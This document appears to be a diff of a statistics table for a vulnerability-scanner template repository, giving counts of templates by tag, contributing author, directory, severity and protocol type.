-| e-mobile | 1 | | | | | | | | | -| airee | 1 | | | | | | | | | -| pghero | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| garagemanagementsystem | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| radius | 1 | | | | | | | | | -| webviewer | 1 | | | | | | | | | -| stats | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| vault | 1 | | | | | | | | | -| pandorafms | 1 | | | | | | | | | -| envoy | 1 | | | | | | | | | -| cname | 1 | | | | | | | | | -| cve2000 | 1 | | | | | | | | | -| mongoose | 1 | | | | | | | | | -| np | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| emerson | 1 | | | | | | | | | -| helprace | 1 | | | | | | | | | -| bitdefender | 1 | | | | | | | | | -| ti-woocommerce-wishlist | 1 | | | | | | | | | -| shindig | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| holidayapi | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| dropbox | 1 | | | | | | | | | -| currencyscoop | 1 | | | | | | | | | -| hypertest | 1 | | | | | | | | | -| tls | 1 | | | | | | | | | -| tugboat | 1 | | | | | | | | | -| gpon | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| concrete5 | 1 | | | | | | | | | -| collectd | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| csrfguard | 1 | | | | | | | | | -| patreon-connect | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| html2wp | 1 | | | | | | | | | -| macaddresslookup | 1 | | | | | | | | | -| ruoyi | 1 | | | | | | | | | -| wordpress-country-selector | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| rsa | 1 | | | | | | | | | -| rainloop | 1 | | | | | | | | | -| curcy | 1 | | | | | | | | | -| wptouch | 1 | | | | | | | | | -| AlphaWeb | 1 | | | | | | | | | -| graphiql | 1 | | | | | | | | | -| html2pdf | 1 | | | | | | | | | -| incomcms | 1 | | | | | | | | | -| jmeter | 1 | | | | | | | | | -| ccm | 1 | | | | | | | | | -| director | 1 | | | | | | | | | -| atg | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| spinnaker | 1 | | | | | | | | | -| telecom | 1 | | | | | | | | | -| flureedb | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| leanix | 1 | | | | | | | | | -| mirasys | 1 | | | | | | | | | -| ojs | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| olt | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| jreport | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| qvidium | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| wpcargo | 1 | | | | | | | | | -| mozilla | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| securityspy | 1 | | | | | | | | | -| appsmith | 1 | | | | | | | | | -| strikingly | 1 | | | | | | | | | -| mastodon | 1 | | | | | | | | | -| cve2001 | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| tink | 1 | | | | | | | | | -| remkon | 1 | | | | | | | | | -| vcloud | 1 | | | | | | | | | -| mailwatch | 1 | | | | | | | | | -| segment | 1 | | | | | | | | | -| pyproject | 1 | | | | | | | | | -| h2 | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| fastpanel | 1 | | | | | | | | | -| binom | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| bibliopac | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| backupbuddy | 1 | | | | | | | | | -| satellian | 1 | | | | | | | | | -| davantis | 1 | | | | | | | | | -| logger1000 | 1 | | | | | | | | | -| tufin | 1 | | | | | | | | | -| rwebserver | 1 | | | | | | | | | -| nzbget | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| myanimelist | 1 | | | | | | | | | -| quixplorer | 1 | | | | | | | | | -| bacnet | 1 | | | | | | | | | -| placeos | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| pagecdn | 1 | | | | | | | | | -| machproweb | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| fontawesome | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 1575 | dhiyaneshdk | 707 | cves | 1552 | info | 1919 | http | 4630 | +| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1169 | network | 84 | +| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 | +| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 | +| wp-plugin | 579 | geeknik | 220 | misconfiguration | 371 | low | 294 | | | +| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | | +| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | | +| xss | 548 | dwisiswant0 | 171 | workflows | 190 | | | | | +| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | | +| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | +| rce | 352 | princechaddha | 154 | network | 70 | | | | | +| packetstorm | 294 | gy741 | 137 | takeovers | 68 | | | | | +| cve2022 | 283 | arafatansari | 112 | iot | 45 | | | | | +| wpscan | 268 | tess | 86 | miscellaneous | 27 | | | | | +| misconfig | 242 | madrobot | 65 | cnvd | 25 | | | | | +| token-spray | 237 | zzeitlin | 64 | dns | 17 | | | | | +| cve2020 | 224 | idealphase | 62 | fuzzing | 12 | | | | | +| unauth | 211 | akincibor | 55 | ssl | 8 | | | | | +| wp | 201 | theamanrawat | 51 | headless | 7 | | | | | +| top-200 | 200 | for3stco1d | 50 | | | | | | | +| | 195 | gaurang | 42 | | | | | | | +| config | 173 | philippedelteil | 39 | | | | | | | +| kev | 168 | edoardottt | 36 | | | | | | | +| cve2018 | 145 | c-sh0 | 34 | | | | | | | +| default-login | 139 | righettod | 33 | | | | | | | +| cve2019 | 138 | adam crosser | 31 | | | | | | | +| joomla | 135 | ice3man | 26 | | | | | | | +| iot | 132 | organiccrap | 24 | | | | | | | +| apache | 131 | hardik-solanki | 23 | | | | | | | +| oast | 128 | ffffffff0x | 22 | | | | | | | +| sqli | 126 | techbrunchfr | 21 | | | | | | | +| authenticated | 124 | cckuailong | 18 | | | | | | | +| cve2010 | 111 | sullo | 17 | | | | | | | +| files | 101 | pr3r00t | 15 | | | | | | | +| top-100 | 100 | sheikhrishad | 15 | | | | | | | +| router | 95 | johnk3r | 14 | | | | | | | +| redirect | 91 | r3dg33k | 14 | | | | | | | +| login | 89 | milo2012 | 14 | | | | | | | +| network | 88 | sharath | 13 | | | | | | | +| token | 76 | random-robbie | 13 | | | | | | | +| devops | 76 | 0ri2n | 13 | | | | | | | +| ssrf | 75 | tenbird | 13 | | | | | | | +| takeover | 74 | suman_kar | 12 | | | | | | | +| cve2017 | 71 | melbadry9 | 12 | | | | | | | +| auth-bypass | 69 | elsfa7110 | 11 | | | | | | | +| cms | 67 | wdahlenb | 11 | | | | | | | +| file | 66 | cyllective | 11 | | | | | | | +| oracle | 63 | dogasantos | 11 | | | | | | | +| install | 63 | alph4byt3 | 10 | | | | | | | +| intrusive | 60 | nadino | 10 | | | | | | | +| seclists | 58 | hackergautam | 10 | | | | | | | +| disclosure | 57 | logicalhunter | 10 | | | | | | | +| oss | 52 | meme-lord | 10 | | | | | | | +| cisco | 50 | random_robbie | 10 | | | | | | | +| cve2016 | 49 | emadshanab | 9 | | | | | | | +| google | 48 | 0x240x23elu | 9 | | | | | | | +| fileupload | 47 | oppsec | 9 | | | | | | | +| cve2015 | 47 | zh | 8 | | | | | | | +| adobe | 45 | iamthefrogy | 8 | | | | | | | +| logs | 42 | veshraj | 8 | | | | | | | +| aem | 42 | aashiq | 8 | | | | | | | +| plugin | 41 | that_juan_ | 8 | | | | | | | +| cve2014 | 41 | lu4nx | 8 | | | | | | | +| hackerone | 41 | leovalcante | 7 | | | | | | | +| debug | 40 | randomstr1ng | 7 | | | | | | | +| vmware | 39 | amit-jd | 7 | | | | | | | +| vulhub | 38 | its0x08 | 7 | | | | | | | +| atlassian | 38 | divya_mudgal | 7 | | | | | | | +| tenable | 36 | harshbothra_ | 7 | | | | | | | +| traversal | 35 | caspergn | 7 | | | | | | | +| springboot | 35 | _0xf4n9x_ | 7 | | | | | | | +| injection | 34 | dr_set | 7 | | | | | | | +| jira | 32 | theabhinavgaur | 7 | | | | | | | +| huntr | 32 | techryptic (@tech) | 7 | | | | | | | +| generic | 31 | kophjager007 | 7 | | | | | | | +| kubernetes | 31 | iamnoooob | 6 | | | | | | | +| listing | 31 | praetorian-thendrickson | 6 | | | | | | | +| dns | 27 | __fazal | 6 | | | | | | | +| log4j | 26 | imnightmaree | 6 | | | | | | | +| sap | 25 | rootxharsh | 6 | | | | | | | +| microsoft | 25 | pathtaga | 6 | | | | | | | +| cnvd | 25 | pentest_swissky | 6 | | | | | | | +| aws | 25 | forgedhallpass | 6 | | | | | | | +| misc | 25 | evan rubinstein | 6 | | | | | | | +| proxy | 23 | gitlab red team | 6 | | | | | | | +| jndi | 23 | nullfuzz | 6 | | | | | | | +| fuzz | 22 | puzzlepeaches | 6 | | | | | | | +| zoho | 22 | clem9669 | 5 | | | | | | | +| manageengine | 22 | robotshell | 5 | | | | | | | +| php | 22 | 0xlittleboy | 5 | | | | | | | +| cve2012 | 21 | xelkomy | 5 | | | | | | | +| wp-theme | 21 | joanbono | 5 | | | | | | | +| api | 21 | podalirius | 5 | | | | | | | +| cloud | 20 | prajiteshsingh | 5 | | | | | | | +| k8s | 20 | nodauf | 5 | | | | | | | +| weblogic | 20 | panch0r3d | 5 | | | | | | | +| cicd | 20 | yanyun | 5 | | | | | | | +| deserialization | 20 | ganofins | 5 | | | | | | | +| tomcat | 19 | shine | 4 | | | | | | | +| ibm | 19 | wisnupramoedya | 4 | | | | | | | +| camera | 19 | 3th1c_yuk1 | 4 | | | | | | | +| dlink | 18 | e_schultze_ | 4 | | | | | | | +| gitlab | 18 | dadevel | 4 | | | | | | | +| firewall | 17 | r3naissance | 4 | | | | | | | +| jenkins | 17 | dolev farhi | 4 | | | | | | | +| ftp | 17 | s0obi | 4 | | | | | | | +| wavlink | 17 | tanq16 | 4 | | | | | | | +| struts | 17 | powerexploit | 4 | | | | | | | +| service | 17 | scent2d | 4 | | | | | | | +| msf | 16 | h1ei1 | 4 | | | | | | | +| printer | 16 | defr0ggy | 4 | | | | | | | +| nginx | 15 | incogbyte | 4 | | | | | | | +| amazon | 15 | jarijaas | 3 | | | | | | | +| cve2009 | 15 | yash anand @yashanand155 | 3 | | | | | | | +| xxe | 15 | supras | 3 | | | | | | | +| fortinet | 15 | emenalf | 3 | | | | | | | +| cve2011 | 15 | fxploit | 3 | | | | | | | +| domainmod | 14 | huowuzhao | 3 | | | | | | | +| lfr | 14 | z3bd | 3 | | | | | | | +| java | 14 | hahwul | 3 | | | | | | | +| hp | 14 | atomiczsec | 3 | | | | | | | +| status | 14 | evergreencartoons | 3 | | | | | | | +| android | 14 | lucasljm2001 | 3 | | | | | | | +| cve2008 | 13 | mr-xn | 3 | | | | | | | +| woocommerce | 13 | johnjhacking | 3 | | | | | | | +| abstractapi | 13 | whoever | 3 | | | | | | | +| cve2013 | 13 | sushantkamble | 3 | | | | | | | +| magento | 13 | dr0pd34d | 3 | | | | | | | +| confluence | 13 | davidmckennirey | 3 | | | | | | | +| graphql | 12 | ambassify | 3 | | | | | | | +| microweber | 12 | swissky | 3 | | | | | | | +| rails | 12 | shifacyclewala | 3 | | | | | | | +| github | 12 | f1tz | 3 | | | | | | | +| vpn | 12 | kh4sh3i | 3 | | | | | | | +| netsweeper | 12 | mavericknerd | 3 | | | | | | | +| fortigate | 12 | impramodsargar | 3 | | | | | | | +| drupal | 12 | ekrause | 3 | | | | | | | +| netgear | 12 | 0w4ys | 3 | | | | | | | +| backup | 12 | dudez | 3 | | | | | | | +| zyxel | 12 | arcc | 3 | | | | | | | +| ruijie | 12 | fyoorer | 3 | | | | | | | +| cnvd2021 | 11 | yuzhe-zhang-0 | 3 | | | | | | | +| mail | 11 | me9187 | 3 | | | | | | | +| ssl | 11 | binaryfigments | 3 | | | | | | | +| airflow | 11 | _generic_human_ | 3 | | | | | | | +| backdoor | 11 | unstabl3 | 3 | | | | | | | +| webserver | 11 | skeltavik | 3 | | | | | | | +| cisa | 11 | andydoering | 3 | | | | | | | +| azure | 11 | thomas_from_offensity | 3 | | | | | | | +| dell | 10 | alifathi-h1 | 3 | | | | | | | +| spring | 10 | ph33r | 3 | | | | | | | +| git | 10 | splint3r7 | 3 | | | | | | | +| jolokia | 10 | lark-lab | 3 | | | | | | | +| grafana | 10 | amsda | 2 | | | | | | | +| django | 10 | luci | 2 | | | | | | | +| laravel | 10 | ree4pwn | 2 | | | | | | | +| glpi | 10 | geekby | 2 | | | | | | | +| coldfusion | 10 | g4l1t0 | 2 | | | | | | | +| admin | 10 | sbani | 2 | | | | | | | +| ruby | 10 | parth | 2 | | | | | | | +| ssh | 9 | cocxanh | 2 | | | | | | | +| kube | 9 | foulenzer | 2 | | | | | | | +| prometheus | 9 | afaq | 2 | | | | | | | +| zimbra | 9 | thezakman | 2 | | | | | | | +| wso2 | 9 | dbrwsky | 2 | | | | | | | +| dedecms | 9 | raesene | 2 | | | | | | | +| sonicwall | 9 | 0xelkomy | 2 | | | | | | | +| zabbix | 9 | taielab | 2 | | | | | | | +| ssti | 9 | bing0o | 2 | | | | | | | +| fastjson | 9 | danielmofer | 2 | | | | | | | +| scada | 9 | github.com/its0x08 | 2 | | | | | | | +| vcenter | 9 | udit_thakkur | 2 | | | | | | | +| versa | 9 | r12w4n | 2 | | | | | | | +| windows | 9 | hackerarpan | 2 | | | | | | | +| iis | 9 | uomogrande | 2 | | | | | | | +| npm | 9 | 0xsmiley | 2 | | | | | | | +| phpmyadmin | 9 | joeldeleep | 2 | | | | | | | +| metadata | 8 | dahse89 | 2 | | | | | | | +| jetbrains | 8 | joshlarsen | 2 | | | | | | | +| kafka | 8 | lotusdll | 2 | | | | | | | +| db | 8 | sinkettu | 2 | | | | | | | +| citrix | 8 | y4er | 2 | | | | | | | +| hms | 8 | gal nagli | 2 | | | | | | | +| solr | 8 | bsysop | 2 | | | | | | | +| bucket | 8 | 0xnirvana | 2 | | | | | | | +| symfony | 8 | gevakun | 2 | | | | | | | +| headless | 8 | nybble04 | 2 | | | | | | | +| jboss | 8 | dheerajmadhukar | 2 | | | | | | | +| solarview | 8 | korteke | 2 | | | | | | | +| recon | 8 | v0idc0de | 2 | | | | | | | +| config-audit | 8 | mohammedsaneem | 2 | | | | | | | +| audit | 8 | notnotnotveg | 2 | | | | | | | +| docker | 8 | israel comazzetto dos reis | 2 | | | | | | | +| elasticsearch | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| mirai | 8 | myztique | 2 | | | | | | | +| auth | 8 | randomrobbie | 2 | | | | | | | +| cisco-switch | 8 | bp0lr | 2 | | | | | | | +| firebase | 8 | manas_harsh | 2 | | | | | | | +| ognl | 7 | kiblyn11 | 2 | | | | | | | +| nodejs | 7 | socketz | 2 | | | | | | | +| blind | 7 | ajaysenr | 2 | | | | | | | +| emerge | 7 | c3l3si4n | 2 | | | | | | | +| samsung | 7 | redteambrasil | 2 | | | | | | | +| ofbiz | 7 | true13 | 2 | | | | | | | +| thinkphp | 7 | rafaelwdornelas | 2 | | | | | | | +| cache | 7 | hetroublemakr | 2 | | | | | | | +| python | 7 | kre80r | 2 | | | | | | | +| exchange | 7 | paperpen | 2 | | | | | | | +| cnvd2020 | 7 | martincodes-de | 2 | | | | | | | +| squirrelmail | 7 | canberbamber | 2 | | | | | | | +| druid | 7 | 666asd | 2 | | | | | | | +| detect | 7 | 0xsapra | 2 | | | | | | | +| icewarp | 7 | convisoappsec | 2 | | | | | | | +| crlf | 7 | d4vy | 2 | | | | | | | +| maps | 7 | moritz nentwig | 2 | | | | | | | +| opencats | 7 | paradessia | 2 | | | | | | | +| go | 7 | sy3omda | 2 | | | | | | | +| seeyon | 7 | zomsop82 | 2 | | | | | | | +| lucee | 6 | nuk3s3c | 2 | | | | | | | +| vms | 6 | vsh00t | 2 | | | | | | | +| openvpn | 6 | bernardofsr | 2 | | | | | | | +| huawei | 6 | 0xprial | 2 | | | | | | | +| redis | 6 | x1m_martijn | 2 | | | | | | | +| filemanager | 6 | k11h-de | 2 | | | | | | | +| bigip | 6 | brenocss | 2 | | | | | | | +| opensis | 6 | badboycxcc | 2 | | | | | | | +| rconfig | 6 | thardt-praetorian | 2 | | | | | | | +| moodle | 6 | fabaff | 2 | | | | | | | +| database | 6 | smaranchand | 2 | | | | | | | +| cobbler | 6 | koti2 | 2 | | | | | | | +| jetty | 6 | bananabr | 2 | | | | | | | +| activemq | 6 | 0xcrypto | 2 | | | | | | | +| ecology | 6 | vavkamil | 2 | | | | | | | +| sitecore | 6 | wa1tf0rme | 2 | | | | | | | +| microstrategy | 6 | clarkvoss | 2 | | | | | | | +| kubelet | 6 | 0xrudra | 2 | | | | | | | +| node | 6 | kishore-hariram | 2 | | | | | | | +| magmi | 6 | shelled | 2 | | | | | | | +| smtp | 6 | cckuakilong | 2 | | | | | | | +| websphere | 6 | nkxxkn | 2 | | | | | | | +| zhiyuan | 6 | megamansec | 2 | | | | | | | +| liferay | 6 | pxmme1337 | 2 | | | | | | | +| slack | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| enum | 6 | w4cky_ | 2 | | | | | | | +| jamf | 6 | n-thumann | 2 | | | | | | | +| artica | 6 | ricardo maia (brainfork) | 2 | | | | | | | +| keycloak | 6 | codexlynx | 2 | | | | | | | +| elfinder | 6 | z0ne | 2 | | | | | | | +| bypass | 6 | ehsahil | 2 | | | | | | | +| setup | 6 | nvn1729 | 2 | | | | | | | +| fpd | 6 | 8arthur | 2 | | | | | | | +| gocd | 5 | vzamanillo | 1 | | | | | | | +| minio | 5 | fopina | 1 | | | | | | | +| apisix | 5 | kurohost | 1 | | | | | | | +| scan | 5 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| firmware | 5 | mukundbhuva | 1 | | | | | | | +| fortios | 5 | d0rkerdevil | 1 | | | | | | | +| awstats | 5 | 0xrod | 1 | | | | | | | +| rfi | 5 | jaimin gondaliya | 1 | | | | | | | +| cacti | 5 | ahmetpergamum | 1 | | | | | | | +| 74cms | 5 | realexp3rt | 1 | | | | | | | +| mongodb | 5 | sherlocksecurity | 1 | | | | | | | +| vbulletin | 5 | tehtbl | 1 | | | | | | | +| error | 5 | kba@sogeti_esec | 1 | | | | | | | +| leak | 5 | djoevanka | 1 | | | | | | | +| storage | 5 | yuansec | 1 | | | | | | | +| avideo | 5 | jcockhren | 1 | | | | | | | +| cockpit | 5 | becivells | 1 | | | | | | | +| prestashop | 5 | ahmed abou-ela | 1 | | | | | | | +| circarlife | 5 | allenwest24 | 1 | | | | | | | +| fatpipe | 5 | udinchan | 1 | | | | | | | +| metinfo | 5 | httpvoid | 1 | | | | | | | +| alibaba | 5 | secthebit | 1 | | | | | | | +| parallels | 5 | igibanez | 1 | | | | | | | +| elastic | 5 | narluin | 1 | | | | | | | +| ec2 | 5 | daviey | 1 | | | | | | | +| solarwinds | 5 | hakimkt | 1 | | | | | | | +| strapi | 5 | amanrawat | 1 | | | | | | | +| plesk | 5 | manuelbua | 1 | | | | | | | +| s3 | 5 | iampritam | 1 | | | | | | | +| carrental | 5 | duty_1g | 1 | | | | | | | +| rseenet | 5 | clment cruchet | 1 | | | | | | | +| gogs | 5 | knassar702 | 1 | | | | | | | +| symantec | 5 | nerrorsec | 1 | | | | | | | +| nagios | 5 | ooooooo_q | 1 | | | | | | | +| hybris | 4 | makyotox | 1 | | | | | | | +| hoteldruid | 4 | florianmaak | 1 | | | | | | | +| nosqli | 4 | yavolo | 1 | | | | | | | +| sonarqube | 4 | kareemse1im | 1 | | | | | | | +| search | 4 | sshell | 1 | | | | | | | +| geoserver | 4 | undefl0w | 1 | | | | | | | +| redmine | 4 | sicksec | 1 | | | | | | | +| yeswiki | 4 | andirrahmani1 | 1 | | | | | | | +| artifactory | 4 | mrcl0wnlab | 1 | | | | | | | +| oauth | 4 | official_blackhat13 | 1 | | | | | | | +| horde | 4 | xstp | 1 | | | | | | | +| rabbitmq | 4 | mihhailsokolov | 1 | | | | | | | +| stripe | 4 | paper-pen | 1 | | | | | | | +| httpserver | 4 | harshinsecurity | 1 | | | | | | | +| cnvd2019 | 4 | omarkurt | 1 | | | | | | | +| hpe | 4 | iphantasmic | 1 | | | | | | | +| akamai | 4 | alex | 1 | | | | | | | +| cve2007 | 4 | sickwell | 1 | | | | | | | +| prtg | 4 | affix | 1 | | | | | | | +| asp | 4 | piyushchhiroliya | 1 | | | | | | | +| springcloud | 4 | akshansh | 1 | | | | | | | +| typo3 | 4 | dawid-czarnecki | 1 | | | | | | | +| telesquare | 4 | 8authur | 1 | | | | | | | +| sendgrid | 4 | zinminphy0 | 1 | | | | | | | +| log | 4 | ayadi | 1 | | | | | | | +| tenda | 4 | shiar | 1 | | | | | | | +| resin | 4 | hardik-rathod | 1 | | | | | | | +| mikrotik | 4 | kiransau | 1 | | | | | | | +| sophos | 4 | aresx | 1 | | | | | | | +| panos | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| hikvision | 4 | 5up3r541y4n | 1 | | | | | | | +| voip | 4 | exid | 1 | | | | | | | +| hongdian | 4 | stupidfish | 1 | | | | | | | +| linkerd | 4 | bjhulst | 1 | | | | | | | +| mailchimp | 4 | exceed | 1 | | | | | | | +| candidats | 4 | luqmaan hadia | 1 | | | | | | | +| tikiwiki | 4 | davidfegyver | 1 | | | | | | | +| ems | 4 | husain | 1 | | | | | | | +| beyondtrust | 4 | borna nematzadeh | 1 | | | | | | | +| sql | 4 | queencitycyber | 1 | | | | | | | +| umbraco | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| vrealize | 4 | jteles | 1 | | | | | | | +| phpinfo | 4 | sak1 | 1 | | | | | | | +| sangfor | 4 | ratnadip gajbhiye | 1 | | | | | | | +| telerik | 4 | natto97 | 1 | | | | | | | +| puppet | 4 | jas37 | 1 | | | | | | | +| flink | 4 | oscarintherocks | 1 | | | | | | | +| couchdb | 4 | arm!tage | 1 | | | | | | | +| dropbear | 4 | act1on3 | 1 | | | | | | | +| microfocus | 4 | yashgoti | 1 | | | | | | | +| thinkcmf | 4 | aceseven (digisec360) | 1 | | | | | | | +| gnuboard | 4 | ph33rr | 1 | | | | | | | +| royalevent | 4 | mesaglio | 1 | | | | | | | +| digitalocean | 4 | kagamigawa | 1 | | | | | | | +| ampache | 4 | anon-artist | 1 | | | | | | | +| adminer | 4 | rotemreiss | 1 | | | | | | | +| bmc | 4 | arjunchandarana | 1 | | | | | | | +| kentico | 4 | andysvints | 1 | | | | | | | +| postmessage | 4 | unkl4b | 1 | | | | | | | +| roxy | 4 | p-l- | 1 | | | | | | | +| wcs | 4 | jbertman | 1 | | | | | | | +| jellyfin | 4 | aringo | 1 | | | | | | | +| oa | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| photo | 4 | regala_ | 1 | | | | | | | +| console | 4 | erethon | 1 | | | | | | | +| gitea | 4 | tirtha | 1 | | | | | | | +| spark | 4 | furkansayim | 1 | | | | | | | +| xmlrpc | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| hashicorp | 4 | fq_hsu | 1 | | | | | | | +| nexus | 4 | lixts | 1 | | | | | | | +| openemr | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| ruckus | 4 | shreyapohekar | 1 | | | | | | | +| phppgadmin | 4 | compr00t | 1 | | | | | | | +| concrete | 4 | zandros0 | 1 | | | | | | | +| terramaster | 4 | izn0u | 1 | | | | | | | +| mautic | 4 | berkdusunur | 1 | | | | | | | +| zte | 4 | justmumu | 1 | | | | | | | +| zend | 4 | dk999 | 1 | | | | | | | +| axigen | 4 | rschio | 1 | | | | | | | +| aspose | 4 | shelld3v | 1 | | | | | | | +| kibana | 4 | chron0x | 1 | | | | | | | +| kevinlab | 4 | momen eldawakhly | 1 | | | | | | | +| caucho | 4 | fmunozs | 1 | | | | | | | +| paypal | 4 | rotembar | 1 | | | | | | | +| aptus | 3 | x6263 | 1 | | | | | | | +| webmin | 3 | elitebaz | 1 | | | | | | | +| ivanti | 3 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| mongo | 3 | dievus | 1 | | | | | | | +| epson | 3 | ramkrishna sawant | 1 | | | | | | | +| goanywhere | 3 | streetofhackerr007 | 1 | | | | | | | +| thinfinity | 3 | philippdelteil | 1 | | | | | | | +| codeigniter | 3 | ipanda | 1 | | | | | | | +| fileman | 3 | h4kux | 1 | | | | | | | +| clusterengine | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| superadmin | 3 | pjborah | 1 | | | | | | | +| blockchain | 3 | ransomsec | 1 | | | | | | | +| intercom | 3 | calumjelrick | 1 | | | | | | | +| mysql | 3 | jbaines-r7 | 1 | | | | | | | +| pfsense | 3 | lethargynavigator | 1 | | | | | | | +| finecms | 3 | charanrayudu | 1 | | | | | | | +| httpbin | 3 | lark lab | 1 | | | | | | | +| cloudflare | 3 | nagli | 1 | | | | | | | +| actuator | 3 | 2rs3c | 1 | | | | | | | +| redash | 3 | 0xd0ff9 | 1 | | | | | | | +| dzzoffice | 3 | hexcat | 1 | | | | | | | +| sentry | 3 | kailashbohara | 1 | | | | | | | +| openam | 3 | jonathanwalker | 1 | | | | | | | +| fuelcms | 3 | mhdsamx | 1 | | | | | | | +| telnet | 3 | 0xtavian | 1 | | | | | | | +| zeroshell | 3 | xshuden | 1 | | | | | | | +| cve2005 | 3 | absshax | 1 | | | | | | | +| matrix | 3 | jaskaran | 1 | | | | | | | +| axis | 3 | mantissts | 1 | | | | | | | +| geowebserver | 3 | _darrenmartyn | 1 | | | | | | | +| kingsoft | 3 | houdinis | 1 | | | | | | | +| ansible | 3 | elmahdi | 1 | | | | | | | +| pega | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| labkey | 3 | patralos | 1 | | | | | | | +| ampps | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| grav | 3 | retr02332 | 1 | | | | | | | +| flexvnf | 3 | kabirsuda | 1 | | | | | | | +| digitalrebar | 3 | notsoevilweasel | 1 | | | | | | | +| selea | 3 | aaronchen0 | 1 | | | | | | | +| harbor | 3 | 0xh7ml | 1 | | | | | | | +| mantisbt | 3 | pudsec | 1 | | | | | | | +| trendnet | 3 | liquidsec | 1 | | | | | | | +| avtech | 3 | adrianmf | 1 | | | | | | | +| globalprotect | 3 | lamscun | 1 | | | | | | | +| proftpd | 3 | carlosvieira | 1 | | | | | | | +| tableau | 3 | whynotke | 1 | | | | | | | +| elementor | 3 | furkansenan | 1 | | | | | | | +| rlm | 3 | majidmc2 | 1 | | | | | | | +| linksys | 3 | rivalsec | 1 | | | | | | | +| payara | 3 | geraldino2 | 1 | | | | | | | +| seagate | 3 | noraj | 1 | | | | | | | +| sharepoint | 3 | opencirt | 1 | | | | | | | +| yonyou | 3 | 0ut0fb4nd | 1 | | | | | | | +| mcafee | 3 | rodnt | 1 | | | | | | | +| facebook | 3 | danigoland | 1 | | | | | | | +| httpd | 3 | coldfish | 1 | | | | | | | +| netlify | 3 | evan rubinstien | 1 | | | | | | | +| netdata | 3 | alevsk | 1 | | | | | | | +| octobercms | 3 | b0rn2r00t | 1 | | | | | | | +| qnap | 3 | dali | 1 | | | | | | | +| servicenow | 3 | f1she3 | 1 | | | | | | | +| empirecms | 3 | caon | 1 | | | | | | | +| webcam | 3 | udyz | 1 | | | | | | | +| pip | 3 | spac3wh1te | 1 | | | | | | | +| metabase | 3 | ohlinge | 1 | | | | | | | +| drawio | 3 | ling | 1 | | | | | | | +| bigant | 3 | phyr3wall | 1 | | | | | | | +| sugarcrm | 3 | manasmbellani | 1 | | | | | | | +| splunk | 3 | petruknisme | 1 | | | | | | | +| eshop | 3 | elouhi | 1 | | | | | | | +| jfrog | 3 | jna1 | 1 | | | | | | | +| pentaho | 3 | kr1shna4garwal | 1 | | | | | | | +| selenium | 3 | bywalks | 1 | | | | | | | +| weiphp | 3 | tirtha_mandal | 1 | | | | | | | +| steve | 3 | sec_hawk | 1 | | | | | | | +| dolibarr | 3 | cookiehanhoan | 1 | | | | | | | +| subrion | 3 | imhunterand | 1 | | | | | | | +| fanruan | 3 | pry0cc | 1 | | | | | | | +| r-seenet | 3 | failopen | 1 | | | | | | | +| synology | 3 | wlayzz | 1 | | | | | | | +| glassfish | 3 | vinit989 | 1 | | | | | | | +| webmail | 3 | evolutionsec | 1 | | | | | | | +| square | 3 | intx0x80 | 1 | | | | | | | +| bitrix | 3 | hanlaomo | 1 | | | | | | | +| sftp | 3 | soyelmago | 1 | | | | | | | +| dreambox | 3 | hakluke | 1 | | | | | | | +| totolink | 3 | b4uh0lz | 1 | | | | | | | +| voipmonitor | 3 | aayush vishnoi | 1 | | | | | | | +| openbmcs | 3 | kaizensecurity | 1 | | | | | | | +| wordfence | 3 | wabafet | 1 | | | 